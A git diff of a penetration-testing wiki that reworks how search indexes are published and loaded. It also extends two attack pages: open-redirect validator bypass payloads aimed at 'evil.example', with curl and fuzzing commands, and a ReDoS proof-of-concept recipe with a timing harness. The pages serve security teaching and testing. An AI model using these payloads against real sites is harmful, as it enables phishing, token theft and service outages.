diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml
index 94f5b5b94..f11da8c51 100644
--- a/.github/workflows/build_master.yml
+++ b/.github/workflows/build_master.yml
@@ -43,7 +43,7 @@ jobs:
&& sudo apt update \
&& sudo apt install gh -y
- - name: Publish search index release asset
+ - name: Push search index to hacktricks-searchindex repo
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -51,43 +51,99 @@ jobs:
set -euo pipefail
ASSET="book/searchindex.js"
- TAG="searchindex-en"
- TITLE="Search Index (en)"
+ TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
+ FILENAME="searchindex-en.js"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
- TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+ TOKEN="${PAT_TOKEN}"
if [ -z "$TOKEN" ]; then
- echo "No token available for GitHub CLI" >&2
+ echo "No PAT_TOKEN available" >&2
exit 1
fi
- export GH_TOKEN="$TOKEN"
- # Delete the release if it exists
- echo "Checking if release $TAG exists..."
- if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
- echo "Release $TAG already exists, deleting it..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
- echo "Failed to delete release, trying without cleanup-tag..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
- echo "Warning: Could not delete existing release, will try to recreate..."
- }
- }
- sleep 2 # Give GitHub API a moment to process the deletion
+ # Clone the searchindex repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
+
+ cd /tmp/searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+
+ # Compress the searchindex file
+ cd "${GITHUB_WORKSPACE}"
+ gzip -9 -k -f "$ASSET"
+
+ # Show compression stats
+ ORIGINAL_SIZE=$(wc -c < "$ASSET")
+ COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+ RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+ echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+
+ # Copy the .gz version to the searchindex repo
+ cd /tmp/searchindex-repo
+ cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+
+ # Stage the updated file
+ git add "${FILENAME}.gz"
+
+ # Commit and push with retry logic
+ if git diff --staged --quiet; then
+ echo "No changes to commit"
else
- echo "Release $TAG does not exist, proceeding with creation..."
+ TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+ git commit -m "Update searchindex files - ${TIMESTAMP}"
+
+ # Retry push up to 20 times with pull --rebase between attempts
+ MAX_RETRIES=20
+ RETRY_COUNT=0
+ while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+ if git push origin master; then
+ echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+ break
+ else
+ RETRY_COUNT=$((RETRY_COUNT + 1))
+ if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+ echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+
+ # Try normal rebase first
+ if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+ echo "Rebase successful, retrying push..."
+ else
+ # If rebase fails due to divergent histories (orphan branch reset), re-clone
+ if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+ echo "Detected history rewrite, re-cloning repository..."
+ cd /tmp
+ rm -rf searchindex-repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+ cd searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+
+ # Re-copy the .gz version
+ cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+
+ git add "${FILENAME}.gz"
+ TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+ git commit -m "Update searchindex files - ${TIMESTAMP}"
+ echo "Re-cloned and re-committed, will retry push..."
+ else
+ echo "Rebase failed for unknown reason, retrying anyway..."
+ fi
+ fi
+
+ sleep 1
+ else
+ echo "Failed to push after $MAX_RETRIES attempts"
+ exit 1
+ fi
+ fi
+ done
fi
- # Create new release (with force flag to overwrite if deletion failed)
- gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
- echo "Failed to create release, trying with force flag..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
- sleep 2
- gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
- }
+ echo "Successfully pushed searchindex files"
# Login in AWs
diff --git a/.github/workflows/translate_all.yml b/.github/workflows/translate_all.yml
index b0444f9a7..59b1470c3 100644
--- a/.github/workflows/translate_all.yml
+++ b/.github/workflows/translate_all.yml
@@ -129,7 +129,7 @@ jobs:
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- - name: Publish search index release asset
+ - name: Push search index to hacktricks-searchindex repo
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -137,31 +137,93 @@ jobs:
set -euo pipefail
ASSET="book/searchindex.js"
- TAG="searchindex-${BRANCH}"
- TITLE="Search Index (${BRANCH})"
+ TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
+ FILENAME="searchindex-${BRANCH}.js"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
- TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+ TOKEN="${PAT_TOKEN}"
if [ -z "$TOKEN" ]; then
- echo "No token available for GitHub CLI" >&2
+ echo "No PAT_TOKEN available" >&2
exit 1
fi
- export GH_TOKEN="$TOKEN"
- # Delete the release if it exists
- if gh release view "$TAG" >/dev/null 2>&1; then
- echo "Release $TAG already exists, deleting it..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
- fi
+ # Clone the searchindex repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
- # Create new release
- gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY"
+ # Compress the searchindex file
+ gzip -9 -k -f "$ASSET"
+
+ # Show compression stats
+ ORIGINAL_SIZE=$(wc -c < "$ASSET")
+ COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+ RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+ echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+
+ # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js)
+ cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz"
+
+ # Commit and push with retry logic
+ cd /tmp/searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+ git add "${FILENAME}.gz"
+
+ if git diff --staged --quiet; then
+ echo "No changes to commit"
+ else
+ git commit -m "Update ${FILENAME} from hacktricks-cloud build"
+
+ # Retry push up to 20 times with pull --rebase between attempts
+ MAX_RETRIES=20
+ RETRY_COUNT=0
+ while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+ if git push origin master; then
+ echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+ break
+ else
+ RETRY_COUNT=$((RETRY_COUNT + 1))
+ if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+ echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+
+ # Try normal rebase first
+ if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+ echo "Rebase successful, retrying push..."
+ else
+ # If rebase fails due to divergent histories (orphan branch reset), re-clone
+ if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+ echo "Detected history rewrite, re-cloning repository..."
+ cd /tmp
+ rm -rf searchindex-repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+ cd searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+
+ # Re-copy ONLY the .gz version (no uncompressed .js)
+ cp "${ASSET}.gz" "${FILENAME}.gz"
+
+ git add "${FILENAME}.gz"
+ git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build"
+ echo "Re-cloned and re-committed, will retry push..."
+ else
+ echo "Rebase failed for unknown reason, retrying anyway..."
+ fi
+ fi
+
+ sleep 1
+ else
+ echo "Failed to push after $MAX_RETRIES attempts"
+ exit 1
+ fi
+ fi
+ done
+ fi
- # Login in AWs
+ # Login in AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md
index 2cbc9d4e6..c97bf611c 100644
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@@ -7,12 +7,23 @@
### Redirect to localhost or arbitrary domains
+- If the app “allows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target:
+ - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
+ - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
+ - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
+ - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only “subdomains of X” are allowed but host resolution still points to 127.0.0.1.
+- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
+ - //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
+- Userinfo tricks defeat contains/startswith checks against trusted hosts:
+ - https://trusted.tld@attacker.tld/ → browser navigates to attacker.tld but simple string checks “see” trusted.tld.
+- Backslash parsing confusion between frameworks/browsers:
+ - https://trusted.tld\@attacker.tld → some backends treat “\” as a path char and pass validation; browsers normalize to “/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches.
{{#ref}}
ssrf-server-side-request-forgery/url-format-bypass.md
{{#endref}}
-### Open Redirect to XSS
+### Modern open-redirect to XSS pivots
```bash
#Basic payload, javascript code is executed after "javascript:"
@@ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29
";alert(0);//
```
+
+More modern URL-based bypass payloads
+
+```text
+# Scheme-relative (current scheme is reused)
+//evil.example
+
+# Credentials (userinfo) trick
+https://trusted.example@evil.example/
+
+# Backslash confusion (server validates, browser normalizes)
+https://trusted.example\@evil.example/
+
+# Schemeless with whitespace/control chars
+evil.example%00
+%09//evil.example
+
+# Prefix/suffix matching flaws
+https://trusted.example.evil.example/
+https://evil.example/trusted.example
+
+# When only path is accepted, try breaking absolute URL detection
+/\\evil.example
+/..//evil.example
+```
+```
+
+
## Open Redirect uploading svg files
```html
@@ -173,18 +212,78 @@ exit;
?>
```
+## Hunting and exploitation workflow (practical)
+
+- Single URL check with curl:
+
+```bash
+curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
+```
+
+- Discover and fuzz likely parameters at scale:
+
+
+Click to expand
+
+```bash
+# 1) Gather historical URLs, keep those with common redirect params
+cat domains.txt \
+ | gau --o urls.txt # or: waybackurls / katana / hakrawler
+
+# 2) Grep common parameters and normalize list
+rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
+ | sed 's/\r$//' | sort -u > candidates.txt
+
+# 3) Use OpenRedireX to fuzz with payload corpus
+cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
+
+# 4) Manually verify interesting hits
+awk '/30[1237]|Location:/I' results.txt
+```
+```
+
+
+- Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect.
+
+- Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.
+
+{{#ref}}
+../network-services-pentesting/pentesting-web/nextjs.md
+{{#endref}}
+
+- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide:
+
+{{#ref}}
+./oauth-to-account-takeover.md
+{{#endref}}
+
+- Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for:
+
+```html
+
+
+```
+
## Tools
- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
+- OpenRedireX – fuzzer for detecting open redirects. Example:
-## Resources
+```bash
+# Install
+git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
-- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.
+# Fuzz a list of candidate URLs (use FUZZ as placeholder)
+cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
+```
+
+## References
+
+- In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect you can find fuzzing lists.
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
-
+- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
+- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
{{#include ../banners/hacktricks-training.md}}
-
-
diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md
index 21675cc90..15bccf507 100644
--- a/src/pentesting-web/regular-expression-denial-of-service-redos.md
+++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md
@@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad
## The Problematic Regex Naïve Algorithm
-**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
+**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
+
+### Engine behavior and exploitability
+
+- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
+- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.
## Evil Regexes
@@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
- ([a-zA-Z]+)\*
- (a|aa)+
- (a|a?)+
-- (.\*a){x} for x > 10
+- (.*a){x} for x > 10
All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
+### Practical recipe to build PoCs
+
+Most catastrophic cases follow this shape:
+
+- Prefix that gets you into the vulnerable subpattern (optional).
+- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
+- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).
+
+Minimal examples:
+
+- `(a+)+$` vs input `"a"*N + "!"`
+- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`
+
+Increase N and observe super‑linear growth.
+
+#### Quick timing harness (Python)
+
+```python
+import re, time
+pat = re.compile(r'(\w*_)\w*$')
+for n in [2**k for k in range(8, 15)]:
+ s = 'v' + '_'*n + '!'
+ t0=time.time(); pat.search(s); dt=time.time()-t0
+ print(n, f"{dt:.3f}s")
+```
+
## ReDoS Payloads
### String Exfiltration via ReDoS
@@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (
- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=)((.*)*)*salt$`
- Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
-- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!`
+- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!`
- In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
### ReDoS Controlling Input and Regex
@@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
*/
```
+### Language/engine notes for attackers
+
+- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced.
+- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
+- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
+- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.
+
## Tools
- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
+ - Find vulnerable regexes and auto‑generate evil inputs. Examples:
+ - `pip install regexploit`
+ - Analyze one pattern interactively: `regexploit`
+ - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/`
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
+- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector)
+ - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
+- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector)
+ - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.
+
+> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS.
## References
-- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
+- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
-- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
+- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html)
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
+- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
+- Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2)
{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index dd6a54063..8c4e6faf8 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
-> - **How can I a page of HackTricks?**
+> - **How can I reference a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
diff --git a/theme/ht_searcher.js b/theme/ht_searcher.js
index 6b105f263..9548e9173 100644
--- a/theme/ht_searcher.js
+++ b/theme/ht_searcher.js
@@ -6,34 +6,63 @@
*/
(() => {
- "use strict";
+ "use strict";
+
+ /* ───────────── 0. helpers (main thread) ───────────── */
+ const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); };
+
+ /* ───────────── 1. Web‑Worker code ─────────────────── */
+ const workerCode = `
+ self.window = self;
+ self.search = self.search || {};
+ const abs = p => location.origin + p;
+
+ /* 1 — elasticlunr */
+ try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
+ catch { importScripts(abs('/elasticlunr.min.js')); }
+
+ /* 2 — decompress gzip data */
+ async function decompressGzip(arrayBuffer){
+ if(typeof DecompressionStream !== 'undefined'){
+ /* Modern browsers: use native DecompressionStream */
+ const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip'));
+ const decompressed = await new Response(stream).arrayBuffer();
+ return new TextDecoder().decode(decompressed);
+ } else {
+ /* Fallback: use pako library */
+ if(typeof pako === 'undefined'){
+ try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); }
+ catch(e){ throw new Error('pako library required for decompression: '+e); }
+ }
+ const uint8Array = new Uint8Array(arrayBuffer);
+ const decompressed = pako.ungzip(uint8Array, {to: 'string'});
+ return decompressed;
+ }
+ }
- /* ───────────── 0. helpers (main thread) ───────────── */
- const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); };
-
- /* ───────────── 1. Web‑Worker code ─────────────────── */
- const workerCode = `
- self.window = self;
- self.search = self.search || {};
- const abs = p => location.origin + p;
-
- /* 1 — elasticlunr */
- try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
- catch { importScripts(abs('/elasticlunr.min.js')); }
-
- /* 2 — load a single index (remote → local) */
+ /* 3 — load a single index (remote → local) */
async function loadIndex(remote, local, isCloud=false){
let rawLoaded = false;
if(remote){
+ /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */
try {
const r = await fetch(remote,{mode:'cors'});
- if (!r.ok) throw new Error('HTTP '+r.status);
- importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'})));
- rawLoaded = true;
- } catch(e){ console.warn('remote',remote,'failed →',e); }
+ if (r.ok) {
+ const compressed = await r.arrayBuffer();
+ const text = await decompressGzip(compressed);
+ importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'})));
+ rawLoaded = true;
+ console.log('Loaded compressed from GitHub:',remote);
+ }
+ } catch(e){ console.warn('compressed GitHub',remote,'failed →',e); }
}
+ /* If remote (GitHub) failed, fall back to local uncompressed file */
if(!rawLoaded && local){
- try { importScripts(abs(local)); rawLoaded = true; }
+ try {
+ importScripts(abs(local));
+ rawLoaded = true;
+ console.log('Loaded local fallback:',local);
+ }
catch(e){ console.error('local',local,'failed →',e); }
}
if(!rawLoaded) return null; /* give up on this index */
@@ -61,151 +90,159 @@
return local ? loadIndex(null, local, isCloud) : null;
}
+
+ let built = [];
+ const MAX = 30, opts = {bool:'AND', expand:true};
+
+ self.onmessage = async ({data}) => {
+ if(data.type === 'init'){
+ const lang = data.lang || 'en';
+ const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master';
- (async () => {
- const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
- const lang = htmlLang.split('-')[0];
- const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download';
- const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download';
+ /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */
+ const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz']));
+ const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz']));
- const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
- const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
+ const MAIN_REMOTE_SOURCES = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
+ const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
- const MAIN_REMOTE_SOURCES = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`);
- const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`);
-
- const indices = [];
- const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js', false); if(main) indices.push(main);
- const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js', true ); if(cloud) indices.push(cloud);
-
- if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
-
- /* build index objects */
- const built = indices.map(d => ({
- idx : elasticlunr.Index.load(d.json),
- urls: d.urls,
- cloud: d.cloud,
- base: d.cloud ? 'https://cloud.hacktricks.wiki/' : ''
- }));
-
- postMessage({ready:true});
- const MAX = 30, opts = {bool:'AND', expand:true};
-
- self.onmessage = ({data:q}) => {
- if(!q){ postMessage([]); return; }
-
- const all = [];
- for(const s of built){
- const res = s.idx.search(q,opts);
- if(!res.length) continue;
- const max = res[0].score || 1;
- res.forEach(r => {
- const doc = s.idx.documentStore.getDoc(r.ref);
- all.push({
- norm : r.score / max,
- title: doc.title,
- body : doc.body,
- breadcrumbs: doc.breadcrumbs,
- url : s.base + s.urls[r.ref],
- cloud: s.cloud
+ const indices = [];
+ const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js', false); if(main) indices.push(main);
+ const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js', true ); if(cloud) indices.push(cloud);
+ if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
+
+ /* build index objects */
+ built = indices.map(d => ({
+ idx : elasticlunr.Index.load(d.json),
+ urls: d.urls,
+ cloud: d.cloud,
+ base: d.cloud ? 'https://cloud.hacktricks.wiki/' : ''
+ }));
+
+ postMessage({ready:true});
+ return;
+ }
+
+ const q = data.query || data;
+ if(!q){ postMessage([]); return; }
+
+ const all = [];
+ for(const s of built){
+ const res = s.idx.search(q,opts);
+ if(!res.length) continue;
+ const max = res[0].score || 1;
+ res.forEach(r => {
+ const doc = s.idx.documentStore.getDoc(r.ref);
+ all.push({
+ norm : r.score / max,
+ title: doc.title,
+ body : doc.body,
+ breadcrumbs: doc.breadcrumbs,
+ url : s.base + s.urls[r.ref],
+ cloud: s.cloud
+ });
});
- });
- }
- all.sort((a,b)=>b.norm-a.norm);
- postMessage(all.slice(0,MAX));
- };
- })();
- `;
+ }
+ all.sort((a,b)=>b.norm-a.norm);
+ postMessage(all.slice(0,MAX));
+ };
+ `;
+
+ /* ───────────── 2. spawn worker ───────────── */
+ const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
+
+ /* ───────────── 2.1. initialize worker with language ───────────── */
+ const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
+ const lang = htmlLang.split('-')[0];
+ worker.postMessage({type: 'init', lang: lang});
+
+ /* ───────────── 3. DOM refs ─────────────── */
+ const wrap = document.getElementById('search-wrapper');
+ const bar = document.getElementById('searchbar');
+ const list = document.getElementById('searchresults');
+ const listOut = document.getElementById('searchresults-outer');
+ const header = document.getElementById('searchresults-header');
+ const icon = document.getElementById('search-toggle');
+
+ const READY_ICON = icon.innerHTML;
+ icon.textContent = '⏳';
+ icon.setAttribute('aria-label','Loading search …');
+ icon.setAttribute('title','Search is loading, please wait...');
- /* ───────────── 2. spawn worker ───────────── */
- const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
-
- /* ───────────── 3. DOM refs ─────────────── */
- const wrap = document.getElementById('search-wrapper');
- const bar = document.getElementById('searchbar');
- const list = document.getElementById('searchresults');
- const listOut = document.getElementById('searchresults-outer');
- const header = document.getElementById('searchresults-header');
- const icon = document.getElementById('search-toggle');
-
- const READY_ICON = icon.innerHTML;
- icon.textContent = '⏳';
- icon.setAttribute('aria-label','Loading search …');
- icon.setAttribute('title','Search is loading, please wait...');
-
- const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
- let debounce, teaserCount=0;
-
- /* ───────────── helpers (teaser, metric) ───────────── */
